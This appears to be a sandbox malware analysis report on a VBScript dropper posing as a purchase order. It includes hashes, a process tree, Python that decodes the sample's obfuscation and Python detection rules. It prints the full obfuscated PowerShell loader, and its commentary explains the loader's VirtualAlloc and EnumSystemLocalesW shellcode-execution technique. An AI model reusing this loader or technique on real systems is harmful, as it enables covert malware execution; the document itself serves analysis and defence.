            MD5:5275A510067D1ABB9D22D3925B1C219F
            SHA1:41B1A3E7A0EE598898BFDC2E5BFDF6A2D34E6D64
            SHA-256:F44938B9BA94A2465515FD9EA6D319016294EAFA6EDC89A5D2E736195C3FA649
            SHA-512:B8CC343A3A47116F796D7554DEF206E86DEFEF0379DE0D3EA8870B8655425CD9ADBD08600452313D9D9C7B0483BFCCF1809CB41AB53B36E24D951D6F1F7403DC
            Malicious:false
            Preview:.using System;using System.Runtime.InteropServices;public static class Thwartness1 {[DllImport("ADVAPI32.DLL")]public static extern int GetServiceKeyName(int Noyisl,int Slgt69,int Affal,int baga);[DllImport("gdi32")]public static extern int GetClipRgn(int Mul,int Ggegu);[DllImport("kernel32")]public static extern IntPtr EnumSystemLocalesW(uint v1,int v2);[DllImport("kernel32")]public static extern int GlobalDeleteAtom(int Pre151);[DllImport("gdi32")]public static extern int StrokeAndFillPath(int Ethyl87);[DllImport("user32")]public static extern int CloseClipboard();[DllImport("winspool.drv")]public static extern int ScheduleJob(int Unover226,int akti);[DllImport("ADVAPI32.DLL")]public static extern int QueryServiceConfig(int Regler,int Cos0,int Dispos,int Napho27);[DllImport("winspool.drv")]public static extern int DocumentProperties(int Fors,int Langre,int Skriv,int hem,int Sambaf,int Reti);[DllImport("gdi32")]public static extern int PtVisible(int Sat,int Aspa,int Prjsis);[DllImpo
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
            Category:dropped
            Size (bytes):371
            Entropy (8bit):5.222664376213209
            Encrypted:false
            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fnJUzxs7+AEszI923fz:p37Lvkmb6KzxUWZE2L
            MD5:599EE5EEF75ACB851BF5E4A996A41B67
            SHA1:703DCEB87B4233C99D76D4688223717FD8D1A881
            SHA-256:ED2F6701C64A817806D8556C8D007D28CAF91F01B3A854DDAC1425327B01C002
            SHA-512:3334B84413970134C101D9F39F5AE522651759644081C55D6C9E353AE0D430B9DF8D5A7A5262151149FD711F625F1E6856C0833996CD6C4E2FA39A1E8851CAC9
            Malicious:true
            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.0.cs"
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):4096
            Entropy (8bit):3.308197344184482
            Encrypted:false
            SSDEEP:48:6k94JSH+GEZhAdlfdW4pxrIUZQFnZg1ul9a3hq:7eSeHhYVdWGxrIUq/K
            MD5:60B2FEFC99117C746AFAC55504B79E2C
            SHA1:32A59A55514E4F4E0608C6993F13D1EF455CA951
            SHA-256:725FA9A114EC1E33F22D2FFAB250A6F8D42021C497906481C0A45B7A3D6F3834
            SHA-512:D34334DAB81BADEEB3BB60B5D065BB4C13E581F12C08660205BAAE8F94C72C70D8522DCC6046D102F824C24D254B1C8CD2590B863FDB42AC5F62CEF74447BC80
            Malicious:false
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g.c...........!.................'... ...@....... ....................................@..................................&..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......P ..t...........................................................BSJB............v4.0.30319......l.......#~..T.......#Strings............#US.........#GUID.......p...#Blob...........G.........%3....................%.......................................3.,...............S.4.................................... :............ L............ W............ j............ {............ ..#.......... ............. ............. ..'.......... ..1.......... ............. ........
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
            Category:modified
            Size (bytes):866
            Entropy (8bit):5.297441338370161
            Encrypted:false
            SSDEEP:24:Aqd3ka6Kzx1E2KKaM5DqBVKVrdFAMBJTH:Aika6aHE2KKxDcVKdBJj
            MD5:2DA554008CD82D16927849B91ECB7DF2
            SHA1:D352F0441621E0FFBF6E83D0463449DD17C60D12
            SHA-256:D386A8DD9B8D57B2221AAB1ADEF86C66A3B8508C63E0322C06EA4DCA0C3B829E
            SHA-512:1C6716E6E58B52DE96165A0EFFC16947C81080DBBA8DD8089727635B1DBFC806DE6F7D21655A881F036DA58C5E60EF9DA76A9D860F316BFEA9D2F39DF269F83A
            Malicious:false
            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
            File type:ASCII text, with CRLF line terminators
            Entropy (8bit):5.869402783042103
            TrID:
              File name:PO-09784893 xlsx.vbs
              File size:359082
              MD5:bfa859d9ad7b23d3606ea13f525065a7
              SHA1:a1b3e395dc20bcdaa866b953a08a48d0079bace2
              SHA256:ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002
              SHA512:355600deeb50415c614e324248f918e3296a9e5b5cf0c3c89a4a41b4d796c6e556f418895fcd0bd132c38cea753e56d9f731b192e9bbf780f97a95847478017d
              SSDEEP:6144:JBYNxYY6fG4TOZLzB65IL/IRL5PIQTzW42RcCUsaPw9L3x2I/rjbpHZIKK:7U6+4q5B65dRVPIQMcCUsqQU86KK
              TLSH:A8748C1CDA2527D7FD1A735AA8D10AC83DED30251F26F769ACED4279F1C21D8873A209
              File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
              Icon Hash:e8d69ece869a9ec4
              No network behavior found

              Target ID:0
              Start time:17:58:22
              Start date:28/11/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
              Imagebase:0x7ff731e70000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:1
              Start time:17:58:25
              Start date:28/11/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:CMD.EXE /c echo C:\Windows
              Imagebase:0x7ff627730000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:2
              Start time:17:58:25
              Start date:28/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:3
              Start time:17:58:57
              Start date:28/11/2022
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh 
GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuITamBlpLdoChrLutBa(An`"""SegAddFriFr3af2Tr`"""No)Ga]GlpFruFobSclIriLecDo UmscatOuaNytCeiStcfo DieTjxbltMoefurkinSc FliBlnSttSi DoPmatKrVFuiImsSuiNobHelSaeAf(PeiBrnSktSt BjSsnaKutAf,PaiCynIntRo ciAPssPspKoafa,LsiSenbatsl JePRerTajSesTiiUnsTg)su;Ny[HuDSalGalTjIOlmSepAropirRetLe(Vi`"""DeuLesAfeSmrFo3Bu2An`"""pa)Sw]SkpAcuDibinlKriNrcBl TasUntBiaPotAniIncCh CoeFrxPltLoeUnrPenTo HyiTunprtMa jaGPreFotBuMSkeSpsNssBeaMagAieTi(PoiinnautSl TyGTuiChrDi,TriLanHotSt AmSSitTorDoaFa,SkibanRetin PrkBeiInpPrkRoaLalBo,AdiAnnAntGe UlFBeiRerNr)So;Kh[InDHolRilRkIGumrepfloGarIstLa(Pa`"""PekEseSkrArnSaeChlMe3An2ti`"""Ji)Ca]SapCeuCabAflReiTocUn PesCltLiaSetOciDacCh KoeAlxUntPreDerNinCi DiiFonPltFl DuVPoiSarFotHeuOgaThlFeAUnlMolSeoDicRe(TrisknSytDo SevNe1Ko,KaiBanBetNi PrvKn2Bi,HeiBanAmtMo InvSt3Bu,CoiMunMitTr Sivti4To)Tr;Bl[MaDinlDelJuISvmMepKboMirRitVi(Gr`"""DiAToDboVToAMaPMiIHa3Hv2Ho.BrDDeLKaLUn`"""Ru)Am]RgpKauTybVilDaiUncCh 
TosNetUnaMetUniBrcSe SeeNexEntIneDarBinQu AriStnSttOp RaRDoeTrgLiLOvopsaDadOpKHoeFryFr(SiiPhnSatIn syDZaaHocUnrImyBa,FaiUnnaltFo SpSSatHaoUnrPr,TiiHinPutBu NoONanEscfi)He;Po[noDCelHalBlIStmUnpUnoDarArtGi(Ge`"""SpgundSliMo3Sp2Pa`"""Em)Ti]AlpDiuFabTrlLiiChcGe PosKotHoaCetFliStcSe TreLsxRetAceUrrConBa FoiInnMitTr DdWAeiGedKaePrnfiPTjaSttBlhVe(StiHanTutIs TeOGabBydBauTr)St;Ra}Fj'Al;Bj`$DdTPohPawPlaRerFrtFrnvieVisDesSh3Gu=Fr[UdTPshRewKaaOnrSetPjnTreScsWosAr1Ov]Ca:Kn:frVMaiVirSetheuHoaVelStANulArlFooNocSu(So0Nu,Re1Mi0Cl4Ha8Mi5Pr7Ka6Mo,Un1Un2Fr2Br8Ce8Sm,pe6Tr4po)jo;Se`$ReNWiaCreFggLaaAntTaePu=Mi(NoGBleMntBu-ScIPatCieNemAuPDyrFooKupSleKurTrtInyKa Tv-haPBaaExtLohLi Ch'GyHFiKSuCSeUEn:Fr\InTVorMuekaeUotPsiSksIneFu\SkFAneDijStlErtCaoCalHvkBlnPoiPrnNegCheBanovsMu1Ef6Fo0Ka'Ha)Ci.TiHBaeSulViafofSotBoeHonElsSlfMoiKolLomSyeLnnResBr;Ft`$FoVToiJalKrlfeiPagPesRetAreKnsSy Ne=Tv Rl[VoSCyyKnsadtLeeAdmSk.OuCAdoUnnHevnoeFirNotSi]Ov:Ac:RaFMurZeoKmmevBBeaNysMueRe6Un4MoSSltRerStiUnnCogKl(Ga`$StNChaGeePrgAuaLotObeFa)Me;Kv[SoSGryBesMatEmeSmmFe.crRInuGrnLetRiiStmdeeIm.KaIFrnAjtFleOprcroBepPrSGaeGrrSnvIniGncOveHosFa.HaMInaVerGosFrhAnaAllBl]Fr:El:WaCVaoVapCoyir(Un`$HiVTriSilSwlShiSagCosartFreSlsCa,Br ca0Gs,Ru Be Cr`$HeTRehBewBiaWorFltUnnOveUnsHysVa3Ug,By Zy`$BiVSpiSalGrlKoiSvgKrsLitUdeDrsAd.HecMioPouAjnCttHa)Ov;Me[HyTBuhPrwFyausrAntBenMaeMospasHo1In]Je:Sa:HoEtrnBiuPimFrSBrycesditBeeKamUdLAeoDrcKoaGelOpeLesGeWVi(Bo`$feTSahSkwJoaEnrCitPrnPeeSasTossi3Bi,be Kr0De)rh#Te;""";Function Thwartness4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Sallowy = $Sallowy + $HS.Substring($i, 1); } $Sallowy;}$Fictioneer0 = Thwartness4 'UdIReEDiXSk ';$Fictioneer1= Thwartness4 $Saudiarabiske;&$Fictioneer0 $Fictioneer1;;
              Imagebase:0x30000
              File size:430592 bytes
              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high
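
The command line of Target ID 3 is the PowerShell stage in clear text: $Saudiarabiske is a string in which only every third character (index 2, 5, 8, ...) carries meaning, and the Thwartness4 function at the end of the line strips the two filler characters from each triple. It is applied twice: once to the literal 'UdIReEDiXSk ', which yields IEX, and once to the long string, so that &$Fictioneer0 $Fictioneer1 is simply IEX of the decoded script. The Python below is an added example, not code from the report or from the sample. It ports that loop faithfully, including its Length-1 bound that drops the final character, and runs it over pieces copied verbatim from the captured command line. Two points are this example's assumptions rather than statements of the report: the captured line still carries two quoting layers (command-line quote doubling and PowerShell's backtick escape), and the decoded text only lands on 3-character boundaries if the backtick-plus-three-quotes sequence is read as one double quote and backtick-plus-dollar as a bare dollar sign, which unescape_captured does; and find_stride, a brute-force helper for variants that change the stride or offset, is the example's own addition.

```python
"""Port of the Thwartness4 stride decoder from the captured PowerShell
command line (Target ID 3).  Added example; not the sample's or the
report's own code."""

# Captured loop, for reference:
#   For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Sallowy = $Sallowy + $HS.Substring($i, 1); }
# It keeps every third character from index 2 and, because the bound is
# Length-1 rather than Length, silently drops the last character.


def thwartness4(hs: str) -> str:
    """Faithful port of the sample's loop, off-by-one included."""
    out = []
    i = 2
    while i < len(hs) - 1:
        out.append(hs[i])
        i += 3
    return "".join(out)


def unescape_captured(s: str) -> str:
    """Collapse the quoting layers of a sandbox-captured command line.

    ASSUMPTION (inferred from this capture, not stated by the report):
    by the time PowerShell holds the string, backtick + three double quotes
    has become one double quote and backtick + dollar a bare dollar sign.
    Only after that collapse does the decoded text fall on 3-char boundaries.
    """
    return s.replace('`"""', '"').replace('`$', '$')


def decode(chunk: str) -> str:
    return thwartness4(unescape_captured(chunk))


def find_stride(blob: str, markers=("Add-Type", "IEX", "using System"), max_stride: int = 8):
    """Example's own helper for variants that change stride/offset: return the
    first (stride, offset) whose plain slice contains a marker, else None."""
    for stride in range(1, max_stride + 1):
        for offset in range(stride):
            if any(m in blob[offset::stride] for m in markers):
                return stride, offset
    return None


# Pieces copied verbatim from the captured command line.  Each starts on a
# 3-character boundary of the original string; the two trailing filler
# characters belong to the next triple and keep the Length-1 bound from
# eating the last real character.  FINAL_CALL is the end of the string, so
# nothing follows it and its last character really is dropped.
IEX_LITERAL = "UdIReEDiXSk "
PREFIX = r"KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr"
VIRTUALALLOC_DECL = r'Kh[InDHolRilRkIGumrepfloGarIstLa(Pa`"""PekEseSkrArnSaeChlMe3An2ti`"""Ji)Ca]SapCeuCabAflReiTocUn PesCltLiaSetOciDacCh KoeAlxUntPreDerNinCi DiiFonPltFl DuVPoiSarFotHeuOgaThlFeAUnlMolSeoDicRe(TrisknSytDo SevNe1Ko,KaiBanBetNi PrvKn2Bi,HeiBanAmtMo InvSt3Bu,CoiMunMitTr Sivti4To)Tr;Bl'
VIRTUALALLOC_CALL = "Bj`$DdTPohPawPlaRerFrtFrnvieVisDesSh3Gu=Fr[UdTPshRewKaaOnrSetPjnTreScsWosAr1Ov]Ca:Kn:frVMaiVirSetheuHoaVelStANulArlFooNocSu(So0Nu,Re1Mi0Cl4Ha8Mi5Pr7Ka6Mo,Un1Un2Fr2Br8Ce8Sm,pe6Tr4po)jo;Se"
REGISTRY_READ = r"Se`$ReNWiaCreFggLaaAntTaePu=Mi(NoGBleMntBu-ScIPatCieNemAuPDyrFooKupSleKurTrtInyKa Tv-haPBaaExtLohLi Ch'GyHFiKSuCSeUEn:Fr\InTVorMuekaeUotPsiSksIneFu\SkFAneDijStlErtCaoCalHvkBlnPoiPrnNegCheBanovsMu1Ef6Fo0Ka'Ha)Ci.TiHBaeSulViafofSotBoeHonElsSlfMoiKolLomSyeLnnResBr;Ft"
FINAL_CALL = "Me[HyTBuhPrwFyausrAntBenMaeMospasHo1In]Je:Sa:HoEtrnBiuPimFrSBrycesditBeeKamUdLAeoDrcKoaGelOpeLesGeWVi(Bo`$feTSahSkwJoaEnrCitPrnPeeSasTossi3Bi,be Kr0De)rh#Te;"

PIECES = [
    ("IEX literal", IEX_LITERAL),
    ("prefix", PREFIX),
    ("VirtualAlloc decl", VIRTUALALLOC_DECL),
    ("VirtualAlloc call", VIRTUALALLOC_CALL),
    ("registry read", REGISTRY_READ),
    ("final call", FINAL_CALL),
]

if __name__ == "__main__":
    for name, piece in PIECES:
        print(f"{name:18} {decode(piece)}")
    print("stride/offset guessed from prefix:", find_stride(PREFIX))
```

Decoded, the pieces read Add-Type -TypeDefinition 'using System;using System.Runtime.InteropServices;public static class Thwartness1 {, a [DllImport("kernel32")] declaration of VirtualAlloc, then $Thwartness3=[Thwartness1]::VirtualAlloc(0,1048576,12288,64) (1 MiB, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE), a Get-ItemProperty read of HKCU:\Treetise\Fejltolkningens160, and finally [Thwartness1]::EnumSystemLocalesW($Thwartness3, 0), the callback-pointer trick that transfers execution into the RWX buffer. The rest of the string, decoded the same way, is the FromBase64String of the registry value and a Marshal.Copy of the bytes into that buffer. The decoded Add-Type is also why csc.exe and cvtres.exe (Target IDs 7 and 8) appear in the tree: Add-Type compiles the P/Invoke wrapper at run time. Note the author padded the IEX literal with a trailing space precisely because the loop drops the last character.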

              Target ID:4
              Start time:17:58:58
              Start date:28/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:7
              Start time:17:59:56
              Start date:28/11/2022
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
              Imagebase:0x910000
              File size:2170976 bytes
              MD5 hash:350C52F71BDED7B99668585C15D70EEA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:moderate

              Target ID:8
              Start time:17:59:57
              Start date:28/11/2022
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"
              Imagebase:0x1120000
              File size:43176 bytes
              MD5 hash:C09985AE74F0882F208D75DE27770DFA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
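
The process entries above are the whole delivery chain: wscript.exe runs the .vbs, a 32-bit powershell.exe is started from SysWOW64 on a 64-bit host with a multi-kilobyte command line, Add-Type hands a .cmdline response file under AppData\Local\Temp to csc.exe, and csc.exe calls cvtres.exe. The report's signatures Wscript starts Powershell, Very long command line found and the Sigma rule Dot net compiler compiles file from suspicious location each key on one of those facts. The Python below is an added example, not part of the Joe Sandbox report, that expresses those checks as rules over process-creation events constructed from the command lines in this section. The event layout, the PIDs other than 4180 and 5132, the padding that stands in for the obfuscated PowerShell body, and the parent of powershell.exe (assumed to be wscript.exe, which this part of the report does not show) are the example's own assumptions.

```python
"""Process-tree checks mirroring this report's behaviour signatures.
Added example, not part of the Joe Sandbox report.  The event layout is
this example's simplification of a process-creation record (Sysmon
Event ID 1 style), not a real schema."""

import re

# Constructed events.  Command lines come from the report's process entries;
# PIDs 4180 and 5132 are the report's, the other PIDs are placeholders, and
# the parent of powershell.exe is ASSUMED to be wscript.exe.  The obfuscated
# PowerShell body is replaced by stand-in padding of similar size (~4 KB).
EVENTS = [
    {"pid": 4180, "ppid": 1000, "wow64": False,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"'},
    {"pid": 5132, "ppid": 4180, "wow64": False,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"CMD.EXE /c echo C:\Windows"},
    {"pid": 6100, "ppid": 4180, "wow64": True,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe "$Saudiarabiske = ' + "K" * 4200 + '"'},
    {"pid": 6200, "ppid": 6100, "wow64": True,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline"'},
    {"pid": 6300, "ppid": 6200, "wow64": True,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
DOTNET_COMPILERS = {"csc.exe", "vbc.exe"}
# csc/vbc reading a response file from a user's Temp directory
TEMP_CMDLINE = re.compile(r'\\AppData\\Local\\Temp\\[^"]*\.cmdline', re.IGNORECASE)
LONG_CMDLINE = 1000  # characters; the captured line is several times this


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid):
    """Yield parent, grandparent, ... while the chain stays inside by_pid."""
    seen = {event["pid"]}
    parent = by_pid.get(event["ppid"])
    while parent is not None and parent["pid"] not in seen:
        seen.add(parent["pid"])
        yield parent
        parent = by_pid.get(parent["ppid"])


def wscript_to_powershell(event, by_pid) -> bool:
    """'Wscript starts Powershell (via cmd or directly)': any script-host ancestor."""
    return basename(event["image"]) in SHELLS and any(
        basename(a["image"]) in SCRIPT_HOSTS for a in ancestors(event, by_pid))


def wow64_powershell(event, by_pid) -> bool:
    """32-bit PowerShell on a 64-bit host (Target ID 3: Wow64 process: true)."""
    return basename(event["image"]) in SHELLS and bool(event["wow64"])


def long_cmdline(event, by_pid) -> bool:
    """'Very long command line found'."""
    return len(event["cmdline"]) > LONG_CMDLINE


def csc_from_temp(event, by_pid) -> bool:
    """Sigma 'Dot net compiler compiles file from suspicious location'."""
    return basename(event["image"]) in DOTNET_COMPILERS and bool(
        TEMP_CMDLINE.search(event["cmdline"]))


RULES = {
    "wscript_to_powershell": wscript_to_powershell,
    "wow64_powershell": wow64_powershell,
    "long_cmdline": long_cmdline,
    "csc_from_temp": csc_from_temp,
}


def evaluate(events):
    """Return {pid: [names of rules that fired]} for events with at least one hit."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for e in events:
        fired = [name for name, rule in RULES.items() if rule(e, by_pid)]
        if fired:
            hits[e["pid"]] = fired
    return hits


if __name__ == "__main__":
    for pid, names in evaluate(EVENTS).items():
        print(pid, ", ".join(names))
```

Only the powershell.exe and csc.exe events fire; cmd.exe, conhost-style helpers and cvtres.exe stay quiet even though cvtres.exe also touches the Temp directory, because the compiler rule is deliberately scoped to the compiler reading its response file. The ancestor walk rather than a direct parent match is what makes the first rule cover both the direct and the via-cmd.exe case the signature name mentions.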

                Execution Graph

